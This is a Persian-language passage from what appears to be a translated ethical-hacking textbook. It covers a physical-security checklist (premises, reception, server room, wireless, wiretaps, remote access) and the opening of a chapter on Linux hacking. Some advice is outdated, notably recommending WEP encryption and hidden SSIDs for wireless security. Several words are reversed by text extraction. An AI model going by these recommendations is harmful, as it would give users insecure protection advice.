ﺑﻪ ﻫﻤﺎن دﻟﻴﻞ ﻛﻪ ﻧﻴﺎز ﺑﻪ اﻧﻮاع دﻳﮕﺮ اﻣﻨﻴﺖ دارﻳﺪ ( ﻓﻨﻲ ﻳﺎ ﻋﻤﻠﻴﺎﺗﻲ ) ﺑﻪ ﻫﻤﺎن دﻟﻴﻞ ﻫﻢ ﻧﻴﺎز ﺑﻪ ﻣﻌﻴﺎرﻫﺎي اﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ دارﻳﺪ و آن ﺟﻠﻮﮔﻴﺮي از ﻫﻜﺮﻫﺎ ﺑﺮاي دﺳﺘﺮﺳﻲ ﺑﻪ ﺷﺒﻜﻪ و اﻃﻼﻋﺎت ﺷﻤﺎ ﺳﺖ . در ﺻﻮرت وﺟﻮد ﺿﻌﻒ ﻫﺎي ﻣﻌﻴﺎرﻫﺎي اﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ، ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﺑﻪ آﺳﺎﻧﻲ دﺳﺘﺮﺳﻲ ﭘﻴﺪا ﻛﻨﺪ . ﻋﻼوه ﺑﺮ اﻳﻦ، داده ﻫﺎ ﻣﻲ ﺗﻮاﻧﻨﺪ ﺑﻪ دﻻﻳﻞ ﻃﺒﻴﻌﻲ از ﺑﻴﻦ روﻧﺪ ﻳﺎ ﺧﺮاب ﺷﻮﻧﺪ ، ﺑﻨﺎﺑﺮاﻳﻦ، ﻣﺪﻳﺮ ان ر ﻳﺴﻚ زﻣﺎﻧﻴﻜﻪ ﺑﺮﻧﺎﻣﻪ اي ﺑﺮاي اﻣﻨﻴﺖ ﻃﺮاﺣﻲ ﻣﻲ ﻛﻨﻨﺪ، ﻣﺸﻜﻼت ﻃﺒﻴﻌﻲ را ﻧﻴﺰ در ﻧﻈﺮ ﺑﮕﻴﺮﻧﺪ . ﻣﻌﻴﺎرﻫﺎي اﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ، ﺟﻬﺖ ﻴﭘ ﺸ ﺮﻴﮕ ي از ﻣﻮارد زﻳﺮ اﺳﺖ : :

• دﺳﺘﺮﺳﻲ ﻏﻴﺮ ﻣﺠﺎز ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﻛﺎﻣﭙﻴﻮﺗﺮي • ﺳﺮﻗﺖ اﻃﻼﻋﺎت از ﺳﻴﺴﺘﻢ ﻫﺎ • ﺧﺮاﺑﻲ داده ﻫﺎي ذﺧﻴﺮه ﺷﺪه ﺑﺮ روي ﻳﻚ ﺳﻴﺴﺘﻢ • از دﺳﺖ دادن داده ﻫﺎ ﻳﺎ ﺧﺮاﺑﻲ ﺳﻴﺴﺘﻢ ﻫﺎ ﺑﻨﺎ ﺑﺮ دﻻﻳﻞ ﻃﺒﻴﻌﻲ

ﺿﺮورت اﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ

192

ﭼﻪ ﻛﺴﻲ ﻣﺴﺌﻮل اﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ اﺳﺖ؟

در ﻳﻚ ﺳﺎزﻣﺎن، اﻓﺮاد زﻳﺮ ﻣﺴﺌﻮل ﺗﺎﻣﻴﻦ اﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﻫﺴﺘﻨﺪ : :

• ﻣﺎﻣﻮر اﻣﻨﻴﺖ ﻓﻴﺰﻳﻜ ﻲ ﺳﺎزﻣﺎن • ﻣﺘﺨﺼﺼﺎن ﺳﻴﺴﺘﻢ اﻃﻼﻋﺎﺗﻲ • رﺋﻴﺲ ﻣﺎﻣﻮران اﻃﻼﻋﺎﺗﻲ • ﻛﺎرﻛﻨﺎن

در ﻳﻚ ﺳﺎزﻣﺎن، ﺗﻤﺎم اﻓﺮاد، ﻣﺴﺌﻮل اﺟﺮاي ﺳﻴﺎﺳﺖ ﻫﺎي اﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﻫﺴﺘﻨﺪ . ﻣﺎﻣﻮر اﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺳﺎزﻣﺎن، ﻣﺴﺌﻮل اﻳﺠﺎد اﺳﺘﺎﻧﺪارد اﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ و ﭘﻴﺎده ﺳﺎزي ﻣﻌﻴﺎرﻫﺎي اﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ اﺳﺖ . .

ﻋﻮاﻣﻠﻲ ﻛﻪ اﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ را ﺗﺤﺖ ﺗﺎﺛﻴﺮ ﻗﺮار ﻣﻲ دﻫﻨﺪ

اﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ، ﺑﺎ ﻋﻮاﻣﻠﻲ ﺧﺎرج از ﻛﻨﺘﺮل اﻣﻨﻴﺖ ﻓﻴﺰﻳ ﻜﻲ، ﺗﺎﺛﻴﺮ ﻣﻲ ﭘﺬﻳﺮد . ﻋﻮاﻣﻠﻲ ﻛﻪ ﻣﻲ ﺗﻮاﻧﻨﺪ اﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﻳﻚ ﺳﺎزﻣﺎن را ﺗﺤﺖ ﺗﺎﺛﻴﺮ ﻗﺮار دﻫﻨﺪ ﻋﺒﺎرﺗﻨﺪ از : :

• ﺗﺨﺮﻳﺐ • ﺳﺮﻗﺖ • ﻋﻮاﻣﻞ ﻃﺒﻴﻌﻲ از ﻗﺒﻴﻞ o زﻟﺰﻟﻪ o آﺗﺶ ﺳﻮزي o ﺳﻴﻞ

ﻣﺘﺨﺼﺼﺎن اﻣﻨﻴﺘﻲ، ﺑﺎﻳﺪ ﺑﺎ اﻳﻦ رﻳﺴﻚ ﻫﺎ آﺷﻨﺎ ﺑﺎﺷﻨﺪ و ﻃﺒﻴﻌﺘﺎ ﺑﺮﻧﺎﻣﻪ اي ﺑﺮاي آﻧﻬﺎ داﺷﺘﻪ ﺑﺎﺷﻨﺪ . ﺑﺴﻴﺎري از ﺳﺎزﻣﺎن ﻫﺎ، ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺗﺪاوم ﻛﺴﺐ و ﻛﺎر ( BCP ) business continuity plan )) ﻳﺎ ﺑﺮﻧﺎﻣﻪ ﺗﺮﻣﻴﻢ ﻣﺸﻜﻼت ( disaster DRP ) recovery plan )) ﺑﺮاي اﻳﻦ اﺣﺘﻤﺎﻻت دارﻧﺪ . .

193

ﭼﻚ ﻟﻴﺴﺖ اﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ

• ﻣﺤﻴﻂ ﺷﺮﻛﺖ: ورود ﺑﻪ ﺷﺮﻛﺖ ﺑﺎﻳﺪ ﺗﻨﻬﺎ ﺑﺮاي اﻓﺮاد ﻣﺠﺎز اﻣﻜﺎن ﭘﺬﻳﺮ ﺑﺎﺷﺪ . ﺑﺮاي اﻳﻦ ﻣﻨﻈﻮر از دﻳﻮار، ﮔﻴﺖ، ﺣﺼﺎر، ﻧﮕﻬﺒﺎن، و آﻻرم ﺑﺎﻳﺪ اﺳﺘﻔﺎده ﺷﻮد.

در ﺷﻜﻞ زﻳﺮ، ﺗﺼﻮﻳﺮ ﺳﻤﺖ ﭼﭗ ﻧﺸﺎن دﻫﻨﺪه ﻣﺤﺎﻓﻈﺖ ﺑﻬﺘﺮ ﺑﺮاي ورود اﺳﺖ . .

ﻫﻤﭽﻨﻴﻦ از دورﺑﻴﻦ ﻫﺎي ﻧﻈﺎرﺗﻲ ﻧﻴﺰ ﺑﺎﻳﺪ ﺑﺮاي ﻣﺎﻧﻴﺘﻮر ﻛﺮدن ﻣﺤﻴﻂ اﺳﺘﻔﺎده ﺷﻮد . .

• ﭘﺬﻳﺮش: ﻣﻌﻤﻮﻻ ﻗﺴﻤﺖ ﭘﺬﻳﺮش، ﻣﻜﺎن ﺷﻠﻮﻏﻲ اﺳﺖ ﻛﻪ اﻓﺮاد زﻳﺎدي ﺑ ﻪ آﻧﺠﺎ وارد و ﺧﺎرج ﻣﻲ ﺷﻮﻧﺪ ﭘﺲ ﺑﺎﻳﺴﺘﻲ اﻗﺪاﻣﺎﺗﻲ ﺟﻬﺖ ﻣﺤﺎﻓﻈﺖ از آن ﺻﻮرت ﮔﻴﺮد از ﻗﺒﻴﻞ : o ﻓﺎﻳﻞ ﻫﺎ و ﻣﺴﺘﻨﺪات، ﻛﻮل دﻳﺴﻚ، و ... ﻧﺒﺎﻳﺪ ﺑﺮ روي ﻣﻴﺰ ﭘﺬﻳﺮش ﻗﺮار ﺪﻧﮔﻴﺮ o ﻣﻴﺰﻫﺎي ﭘﺬﻳﺮش ﺑﺎﻳﺪ ﺑﮕﻮﻧﻪ اي ﻃﺮ اﺣﻲ ﺷﻮﻧ ﺪ ﻛﻪ ﺟﻠﻮي دﺳﺘﺮﺳﻲ اﻓﺮاد ﺑﻪ اﻳﻦ ﻧﺎﺣﻴﻪ را ﺑﮕﻴﺮ ﺪﻧ o ﺻﻔﺤﻪ ﻛﺎﻣﭙﻴﻮﺗﺮ ﺑﺎﻳﺪ از دﻳﺪ اﻓﺮاد دﻳﮕﺮ ﻣﺤﺎﻓﻈﺖ ﺷﻮد o زﻣﺎﻧﻴﻜﻪ ﻛﺎرﻣﻨﺪ ﭘﺬﻳﺮش ﻧﻴﺴﺖ، ﻣﺎﻧﻴﺘﻮر، ﻛﻴﺒﻮرد، و دﻳﮕﺮ ﺗﺠﻬﻴﺰات روي ﻣﻴﺰ ﭘﺬﻳﺮش، ﻗﻔﻞ ﺑﺎﺷﻨﺪ 194

در ﺷﻜﻞ زﻳﺮ، ﺗﺼﻮﻳﺮ ﺳﻤﺖ ﭼﭗ، ﻣﺤﻴﻄﻲ ﺑﻬﺘﺮ ﺑﺮاي ﺴﻗ ﻤﺖ ﭘﺬﻳﺮش اﺳﺖ . .

• ﺳﺮور: ﻣﻬﻢ ﺗﺮﻳﻦ ﻋﺎﻣﻞ در ﻫﺮ ﺷﺒﻜﻪ، ﺳﺮور اﺳﺖ و ﺑﺎﻳﺪ داراي اﻣﻨﻴﺖ ﺑﺎﻻ ﺑﺎﺷﺪ . اﻗﺪاﻣﺎت زﻳﺮ ﺑﺮاي اﻳﻦ ﻣﻨﻈﻮر ﻣﻲ ﺗﻮاﻧﺪ ﺻﻮرت ﮔﻴﺮد: o ﺪﻳﺎﺑ ﺑﺮاي ورود ﺑﻪ اﺗﺎق ﺳﺮور ، داﺮﻓا اﺣﺮاز ﻫﻮﻳﺖ ﺷﻮﻧﺪ و ﺗﻨﻬﺎ اﻓﺮاد ﻣﺠﺎز ﺣﻖ ورود را داﺷﺘﻪ ﺑﺎﺷﻨﺪ o درب رك ﻗﻔﻞ ﺑﺎﺷﺪ o راه اﻧﺪازي (boot ) ﺳﺮور از ﻃﺮﻳﻖ floppy و CD-ROM ﻣﺠﺎز ﻧﺒﺎﺷﺪ و دراﻳﻮﻫﺎي ﻣﺮﺑﻮط ﺑﻪ آﻧﻬﺎ ﻗﻔﻞ ﺑﺎﺷﺪ o ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ DOS ﺑﺎﻳﺪ از آﻧﻬﺎ ﭘﺎك ﺷﻮد ﺗﺎ ﻣﻬﺎﺟﻢ ﻧﺘﻮاﻧﺪ ﺳﺮور را ﺑﺼﻮرت راه دور و از ﻃﺮﻳﻖ DOS راه اﻧﺪازي ﻛﻨﺪ.

• ﻧﺎﺣﻴﻪ اﻳﺴﺘﮕﺎه ﻛﺎري: ﻧﺎﺣﻴ ﻪ اي اﺳﺖ ﻛﻪ اﻛﺜﺮ ﻛﺎرﻣﻨﺪان ﻛﺎر ﻣﻲ ﻛﻨﻨﺪ . ﺑﺎﻳﺴﺘﻲ ﻛﺎرﻣﻨﺪان درﺑﺎره اﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ آﻣﻮزش ﺑﺒﻴﻨﻨﺪ . ﻫﻤﭽﻨﻴﻦ ﻣﻲ ﺗﻮان ﺑﺎ اﺳﺘﻔﺎده از اﻗﺪاﻣﺎت زﻳﺮ، اﻳﻦ ﻧﺎﺣﻴﻪ را اﻣﻦ ﺳﺎﺧﺖ: o اﺳﺘﻔﺎده از دورﺑﻴﻦ ﻫﺎي ﻧﻈﺎرﺗﻲ o ﻗﻔﻞ ﻛﺮدن ﺻﻔﺤﻪ ﻣﺎﻧﻴﺘﻮرﻫﺎ و ﻛﺎﻣﭙﻴﻮﺗﺮﻫﺎ o ﻃﺮاﺣﻲ ﺧﻮب اﻳﺴﺘﮕﺎه ﻫﺎي ﻛﺎري o ﺟﻠﻮﮔﻴﺮي از اﺳﺘﻔﺎده از ﻛﻮل دﻳﺴﻚ ﻫﺎ 195

در ﺷﻜﻞ زﻳﺮ، ﻧﻤﺎﻳﻲ از اﻳﺴﺘﮕﺎه ﻫﺎي ﻛﺎري ﻛﻪ ﺑﺼﻮرت ﺑﺪ ﻃﺮاﺣ ﻲ ﺷﺪه اﺳﺖ ﻣﺸﺎﻫﺪه ﻣﻲ ﻛﻨﻴﺪ . .

• Access point ﻫﺎي واﻳﺮﻟﺲ: اﮔﺮ ﺮﻜﻫ ﺑﺘﻮاﻧﺪ ﺑﻪ access point ﻫﺎي ﺷﺮﻛﺖ ﻣﺘﺼﻞ ﺷﻮد، ﻣﻲ ﺗﻮاﻧﺪ ﻣﺜﻞ دﻳﮕﺮ ﻛﺎرﻣﻨﺪان، وارد ﺷﺒﻜﻪ آﻧﺠﺎ ﺷﻮد . ﺑﺮاي ﺟﻠﻮﮔﻴﺮي از آن، ﺑﺎﻳﺪ اﻗﺪاﻣﺎت زﻳﺮ ﺻﻮرت ﮔﻴﺮد: o اﺳﺘﻔﺎده از رﻣﺰﮔﺬاري WEP o ﻣﺨﻔﻲ ﺳﺎﺧﺘﻦ SSID o اﺳﺘﻔﺎده از ﭘﺴﻮرد ﺑﺮاي ورود ﺑﻪ access point o ﻗﻮي ﺑﻮدن ﭘﺴﻮرد ﺑﺮاي ﺟﻠﻮﮔﻴﺮي از ﺷﻜﺴﺘﻦ آن

• ﺗﺠﻬﻴﺰات دﻳﮕﺮ از ﻗﺒﻴﻞ ﻓﻜﺲ، و ﻛﻮل دﻳﺴﻚ :ﻫﺎ اﻗﺪاﻣﺎت زﻳﺮ ﺑﺮاي اﻣﻦ ﺳﺎزي اﻳﻦ ﺗﺠﻬﻴﺰات ﺑﺎﻳﺪ اﻧﺠﺎم ﺷﻮد: o ﻣﻮدم ﻫﺎ ﻧﺒﺎﻳﺪ ﺑﺮ روي ﭘﺎﺳﺨﮕﻮﻳﻲ ﺧﻮدﻛﺎر ( auto answer ) ﺗﻨﻈﻴﻢ ﺷﺪه ﺑﺎﺷﻨﺪ o ﻣﺎﺷﻴﻦ ﻫﺎي ﻓﻜﺲ ﻛﻪ ﺑﺮ روي ﻣﻴﺰ ﭘﺬﻳﺮش ﻗﺮار دارﻧﺪ، ﺑﺎﻳﺪ در زﻣﺎﻧﻴﻜﻪ ﻛﺎرﻣﻨﺪ ﭘﺬﻳﺮش ﻧﻴﺴﺖ، ﻗﻔﻞ ﺑﺎﺷﻨﺪ

196

o ﻛﻮل دﻳﺴﻚ ﻫﺎ ﻧﺒﺎﻳﺪ در ﻣﻜﺎن ﻫﺎي ﻋﻤﻮﻣﻲ ﻗﺮار داﺷﺘﻪ ﺑﺎﺷﻨﺪ و ﻛﻮل دﻳﺴﻚ ﻫﺎﻳﻲ ﻛﻪ ﺧﺮاب ﺷﺪه اﻧﺪ ﺑﺎﻳﺪ ﺑﺼﻮرت ﻓﻴﺰﻳﻜﻲ ﻧﺎﺑﻮد ﺷﻮﻧﺪ

• ﻛﻨﺘﺮل دﺳﺘﺮﺳﻲ: ﻛﻨﺘﺮل دﺳﺘﺮﺳﻲ، ﺑﺮاي ﺟﻠﻮﮔﻴﺮي از دﺳﺘﺮﺳﻲ ﻏﻴﺮﻣﺠﺎز ﺑﻪ ﻧﻮاﺣﻲ ﻋﻤﻠﻴﺎﺗﻲ ﺣﺴﺎس اﺳﺖ . ﻣﻲ ﺗﻮان از ﻣﻮارد زﻳﺮ ﺑﺮاي ﻛﻨﺘﺮل دﺳﺘﺮﺳﻲ اﺳﺘﻔﺎده ﻛﺮد: o ﺟﺪاﺳﺎزي ﻧﻮاﺣﻲ ﻛﺎري o ﻛﻨﺘﺮل دﺳﺘﺮﺳﻲ ﺑﻮﺳﻴﻠﻪ ﺑﻴﻮﻣﺘﺮﻳﻚ o ﻛﺎرت ﻫﺎي ورود o ﻧﺸﺎن ﺷﻨﺎﺳﺎﻳﻲ

• ﻧﮕﻬﺪاري ﺗﺠﻬﻴﺰات ﻛﺎﻣﭙﻴﻮﺗﺮ: ﺷﺨﺼﻲ را ﻣﺴﺌﻮل ﻧﮕﻬﺪاري از ﺗﺠﻬﻴﺰات ﻛﺎﻣﭙﻴﻮﺗﺮي ﺑﻜﻨﻴﺪ .

• اﺳﺘﺮاق ﺳﻤﻊ ﻣﻜﺎﻟﻤﺎت: wiretap ، دﺳﺘﮕﺎﻫﻲ اﺳﺖ ﻛﻪ ﺑﺮاي ﺿﺒﻂ ﻣﻜﺎﻟﻤﺎت ﺗﻠﻔﻨﻲ ﺑﻜﺎر ﻣﻲ رود . ﺑﺎﻳﺪ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﺴﻲ ﻣﻜﺎﻟﻤﺎت ﺷﻤﺎ را ﺷﻨﻮد ﻧﻤﻲ ﻛﻨﺪ . ﺑﺮاي اﻳﻦ ﻣﻨﻈﻮر ﺑﺎﻳﺪ ﺑﺮاي ﺗﻤﺎم ﺳﻴﻢ ﻫﺎ از ﻛﺎﺑﻞ ﻫﺎي روﻛﺶ دار ( shilded ) اﺳﺘﻔﺎده ﻛﻨﻴﺪ و ﻧﻴﺰ ﻫﻴﭻ ﺳﻴﻤﻲ را ﺑﺪون روﻛﺶ ﻧﮕﺬارﻳﺪ.

197

• دﺳﺘﺮﺳﻲ ﻫﺎي راه دور: دﺳﺘﺮﺳﻲ راه دور، روﺷﻲ آﺳﺎن ﺑﺮاي ﻛﺎرﻣﻨﺪان اﺳﺖ ﺗﺎ ﺑﺘﻮاﻧﻨﺪ از ﺧﺎرج ﺷﺮﻛﺖ ﻛﺎر ﻛﻨﻨﺪ و ﺑﻪ ﺷﺒﻜﻪ ﺷﺮﻛﺖ ﻣﺘﺼﻞ ﺷﻮد . اﻣﺎ ﻳﻜﻲ از راه ﻫﺎﻳﻲ اﺳﺖ ﻛﻪ ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﺑﺎ اﺳﺘﻔﺎده از آن، ﺑﻪ ﺷﺒﻜﻪ ﺷﺮﻛﺖ دﺳﺘﺮﺳﻲ ﭘﻴﺪا ﻛﻨﺪ . ﺑﺮاي ﺟﻠﻮﮔﻴﺮي از اﺳﺘﺮاق ﺳﻤﻊ، ﺑﺎﻳﺪ اﻃﻼﻋﺎت در ﻃﻮل اﻳﻦ ﻓﺮآﻳﻨﺪ، رﻣﺰ ﺷﺪه ﺑﺎﺷﻨﺪ . دﺳﺘﺮﺳﻲ از راه دور ﺑﺴﻴﺎر ﺧﻄﺮﻧﺎك اﺳﺖ ﺑﺮاي اﻳﻨﻜﻪ ﻫﻜﺮ در ﻧﺰدﻳﻜﻲ ﻣﺎ ﻗﺮار ﻧﺪارد و اﺣﺘﻤﺎل دﺳﺘﮕﻴﺮ ﺷﺪﻧﺶ، ﻛﻢ ﺗﺮ اﺳﺖ.

ﺑﺮﺧﻲ از اﺑﺰارﻫﺎي اﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ

اﺑﺰارﻫﺎي ردﻳﺎﺑﻲ ﻣﺤﻞ ﻟﭗ ﺗﺎپ دزدﻳﺪه: ﺑﺮﻧﺎﻣﻪ ﻫﺎﻳﻲ وﺟﻮد دارﻧﺪ ﻛﻪ زﻣﺎﻧﻴﻜﻪ ﻟﭗ ﺗﺎپ ﺑﻪ اﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ اﺳﺖ، ﻣﻜﺎن ﻟﭗ ﺗﺎپ را ﻣﻲ ﮔﻮﻳﻨﺪ . از ﺟﻤﻠﻪ : www.sentryinc.com ) CyberAngel ، (www.ztrace.com ) Ztrace Gold ) ، ) www.computrace.com ) ComputracePlus ). ﺑﺎ اﺳﺘﻔﺎده از اﻳﻦ اﺑﺰارﻫﺎ ﻣﻲ ﺗﻮاﻧﻴﺪ ﻣﻜﺎن ﻓﻌﻠﻲ ﻟﭗ ﺗﺎپ را ﺑﻴﺎﺑﻴ .ﺪ .ﺪ

دﺳﺘﮕﺎه ﻫﺎي ﺟﺎﺳﻮﺳﻲ: ﺑﺮﺧﻲ از اﻳﻦ اﺑﺰارﻫﺎ ﻋﺒﺎرﺗﻨﺪ از : ﻋﻴﻨﻚ ﺟﺎﺳﻮﺳﻲ، دورﺑﻴﻦ دﻳﺪ در ﺷﺐ، اﺳﭙﺮي ﺑﺮاي دﻳﺪن، ردﻳﺎب GPS ، ﺿﺒﻂ ﻛﻨﻨﺪه ﻣﻜﺎﻟﻤﺎت، ﺗﻐﻴﻴﺮ دﻫﻨﺪه ﺻﺪا و ... . اﻳﻦ اﺑﺰاﻫﺎ ﻣﻲ ﺗﻮاﻧﻨﺪ ﺗﻮﺳﻂ ﭘﺮﺳﻨﻞ ﺷﺮﻛﺖ ﺷﻤﺎ ﺑﺼﻮرت ﺧﻮاﺳﺘﻪ ﺑﺎ ﻧﺎﺧﻮاﺳﺘﻪ ﺣﻤﻞ ﺷﻮﻧﺪ و اﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ را ﺑﻪ ﺧﻄﺮ ﺑﻴﺎﻧﺪازد . .

198

DeviceLock: راه ﺣﻠﻲ ﺑﺮاي ﻛﻨﺘﺮل دﺳﺘﮕﺎه ﻫﺎ اﺳﺖ ﺗﺎ ﻛﺎﻣﭙﻴﻮﺗﺮﻫﺎي ﺷﺒﻜﻪ را از ﺣﻤﻼت داﺧﻠﻲ و ﺧﺎرﺟﻲ، ﻣﺤﻔﻮظ .ﺪﻨﻛ .ﺪﻨﻛ

199

ﻓﺼﻞ دوازدﻫﻢ

ﻫﻚ ﻟﻴﻨﻮﻛﺲ

ﻣﻘﺪﻣﻪ

ﻟﻴﻨﻮﻛﺲ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻣﺤﺒﻮب ياﺮﺑ ﻣﺪﻳﺮان ﺳﻴﺴﺘﻢ ﻫﺎ اﺳﺖ ﺑﺮاي اﻳﻨﻜﻪ اﭘﻦ ﺳﻮرس اﺳﺖ و اﺟﺎزه ﺗﻐﻴﻴﺮ در آن را ﻣﻲ دﻫﺪ . ﺑﺨﺎﻃﺮ اﭘﻦ ﺳﻮرس ﺑﻮدن ﻟﻴﻨﻮﻛﺲ، ﻧﺴﺨﻪ ﻫﺎي ﻣﺨﺘﻠﻔﻲ ﺑﺮاي آن وﺟﻮد دارد ﻛﻪ distribution ﻧﺎم دارد . ﺑﺮﺧﻲ از اﻳﻦ ﺗﻮزﻳﻊ ﻫﺎ، ﺑﻪ ﻋﻨﻮان ﻳﻚ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﺗﺠﺎري ﺑﺮاي ﻛﻼﻳﻨﺖ ﻫﺎ و ﺳﺮورﻫﺎ ﻫﺴﺘﻨﺪ . ﺑﺮﺧﻲ از ﺗﻮزﻳﻊ ﻫﺎي راﻳﺞ آن، Mandrake ، RedHat ، Debian و SUSE اﺳﺖ ﺑﺮﺧﻲ از ورژن ﻫﺎي راﻳﮕﺎن آن ﻧﻴﺰ Gentoo و Knoppix اﺳﺖ.

اﻧﻌﻄﺎف ﭘﺬﻳﺮي و ﻫﺰﻳﻨﻪ ﻟﻴﻨﻮﻛﺲ، و ﻫﻤﭽ ﻨﻴﻦ اﻓﺰاﻳﺶ ﺗﻌﺪاد ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﻟﻴﻨﻮﻛﺲ، ﺳﺒﺐ اﻧﺘﺨﺎب ﻟﻴﻨﻮﻛﺲ ﺑﻪ ﻋﻨﻮان ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﺑﺴﻴﺎري از ﺳﻴﺴﺘﻢ ﻫﺎ ﺷﺪه اﺳﺖ . ﻫﺮ ﭼﻨﺪ ﻛﻪ اﻣﻨﻴﺖ ﻟﻴﻨﻮﻛﺲ ﺑﻴﺸﺘﺮ از وﻳﻨﺪوز اﺳﺖ اﻣﺎ ﺿﻌﻒ ﻫﺎﻳﻲ دراد ﻛﻪ ﻣﻲ ﺗﻮاﻧﺪ ﻣﻮرد ﺳﻮاﺳﺘﻔﺎده ﻗﺮار ﮔﻴﺮد . اﻳﻦ ﻓﺼﻞ در ﻣﻮرد اﺳﺘﻔﺎده از ﻟﻴﻨﻮﻛﺲ ﺑﻪ ﻋﻨﻮان ﺳﻴﺴﺘﻢ ﻋ ﺎﻣﻞ و روش ﻫﺎي اﻣﻦ ﺳﺎزي آن ﺑﺮاي ﺟﻠﻮﮔﻴﺮي از ﺣﻤﻠﻪ ﺗﻮﺿﻴﺢ ﻣﻲ دﻫﺪ . .

اﺳﺎس ﻟﻴﻨﻮﻛﺲ

ﻟﻴﻨﻮﻛﺲ ﺑﺮ ﻣﺒﻨﺎي ﻳﻮﻧﻴﻜﺲ اﺳﺖ و ﻫﺮ ﻛﺴﻲ ﻛﻪ ﺑﺎ ﻣﺤﻴﻂ ﻳﻮﻧﻴﻜﺲ آﺷﻨﺎ ﺑﺎﺷﺪ ﻣﻲ ﺗﻮاﻧﺪ از ﻟﻴﻨﻮﻛﺲ ﻧﻴﺰ اﺳﺘﻔﺎده ﻛﻨﺪ . ﺑﺴﻴﺎري از دﺳﺘﻮرات اﺳﺘﺎﻧﺪارد ، در اﻏﻠﺐ ﺗﻮزﻳﻊ ﻫﺎ ي ﻟﻴﻨﻮﻛﺲ وﺟﻮد دار .ﺪﻧ .ﺪﻧ

وﻳﺮاﻳﺸﮕﺮﻫﺎي ﻣﺘﻨﻲ دﺎﻳز ي در ﻟﻴﻨﻮﻛﺲ ﺟو دﻮ ﺪﻧراد از ﻗﺒﻴﻞ jove ، pico ، ex ، vi و GNU emacs . ﺑﺴﻴﺎري از ﻛﺎرﺑﺮان ﻳﻮﻧﻴﻜﺲ، وﻳﺮاﻳﺸﮕﺮ ﺳﺎده ﻣﺜﻞ vi را ﺗﺮﺟﻴﺢ ﻣﻲ دﻫﻨﺪ . اﻣﺎ اﻳﻦ وﻳﺮاﻳﺸﮕﺮ ﺑﻪ دﻟﻴﻞ ﻗﺪﻳﻤﻲ ﺑﻮدن، ﻣﺤﺪودﻳﺖ ﻲﻳﺎﻫ ﻲﻳﺎﻫ دارد اﻣﺎ وﻳﺮاﻳﺸﮕﺮﻫﺎي ﭘﻴﺸﺮﻓﺘﻪ اي ﻣﺜﻞ emacs ، در ﭼﻨ ﺪ ﺳﺎل اﺧﻴﺮ ﻣﺤﺒﻮﺑﻴﺖ ﻓﺮاواﻧﻲ ﻛﺴﺐ ﻛﺮده .اﻧﺪ .اﻧﺪ

ﺑﺴﻴﺎري از ﻳﻮﺗﻴﻠﻴﺘﻲ ﻫﺎي ﭘﺎﻳﻪ ﻟﻴﻨﻮﻛﺲ، ﻧﺮم اﻓﺰار GNU ﻫﺴﺘﻨﺪ ﺑﻪ اﻳﻦ ﻣﻌﻨﻲ ﻛﻪ ﺑﺼﻮرت راﻳﮕﺎن در ﺟﺎﻣﻌﻪ ﺗﻮزﻳﻊ ﺷﺪه اﻧﺪ . ﻫﻤﭽﻨﻴﻦ ﻳﻮﺗﻴﻠﻴﺘﻲ ﻫﺎي GNU ﻗﺎﺑﻠﻴﺖ ﻫﺎي ﭘﻴﺸﺮﻓﺘﻪ را ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲ ﻛﻨﻨﺪ ﻛﻪ در ﻧﺴﺨﻪ اﺳﺘﺎﻧﺪارد BSD و ﻳﻮﻧﻴﻜﺲ وﺟﻮد ﻧﺪارد . ﺑﺎ اﻳﻦ ﺣﺎل، ﻳﻮﺗﻴﻠﻴﺘﻲ ﻫﺎي GNU ﺑﺎ BSD ﺳﺎزﮔﺎر ﺑﺎﻗﻲ ﺧﻮاﻫﻨﺪ ﻣﺎﻧﺪ . .

ﺷ ﻞ، ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺧﻂ دﺳﺘﻮري اﺳﺖ ﻛﻪ ﺑﻪ ﻛﺎرﺑﺮ اﺟﺎزه ﻣﻲ دﻫﺪ ﺗﺎ دﺳﺘﻮرات را وارد ﻛﻨﺪ و ﺳﻴﺴﺘﻢ، دﺳﺘﻮرات ﻛﺎرﺑﺮ را اﺟﺮا ﻣﻲ ﻛﻨﺪ . ﻋﻼوه ﺑﺮ اﻳﻦ، ﺑﺴﻴﺎري از ﺷﻞ ﻫﺎ، داراي ﻗﺎﺑﻠﻴﺘﻬﺎﻳﻲ از ﻗﺒﻴﻞ ﻛﻨﺘﺮل ﭘﺮدازش ( job control ) ، )

201

